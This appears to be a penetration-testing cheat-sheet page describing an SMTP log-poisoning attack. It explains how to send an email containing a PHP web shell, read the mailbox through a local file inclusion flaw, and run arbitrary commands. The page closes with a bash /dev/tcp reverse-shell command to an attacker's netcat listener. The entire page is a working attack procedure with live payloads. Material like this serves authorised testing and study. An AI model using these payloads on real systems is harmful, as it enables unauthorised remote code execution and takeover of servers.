SMTP Email Shell

This exploit only works if you can view the email on the server (e.g. LFI)

Connect to SMTP (via telnet or netcat)

  • EHLO <your username> >>> Can be anything

  • VRFY asterisk@localhost >>> Verify a local user account (in this case, asterisk)

  • mail from:<the email address that you want the message to appear from>

  • rcpt to: <the recipient's email address>

  • data

  • Subject: <your subject>

<the contents of your email>

  • For a web shell type: <?php echo system($_REQUEST['app']); ?> as the message contents

Enter a blank line

  • Then end the email with .

  • The mail will then be sent to /var/mail/asterisk

  • Browse here with Burp to read the file and execute requests via your php code

  • In the GET request append &app=<linux command> to execute commands on the system

  • Convert this to a POST request >>> Makes things easier

  • Then use this to spawn a shell

  • Append &app=bash -i >& /dev/tcp/<your attacker IP address>/<LPORT> 0>&1

    • Be sure to URL encode this

  • Start up your netcat listener to listen on this LPORT

  • Submit the request to spawn this shell on your attacking machine

PreviousRedisNextPHP Shells

Last updated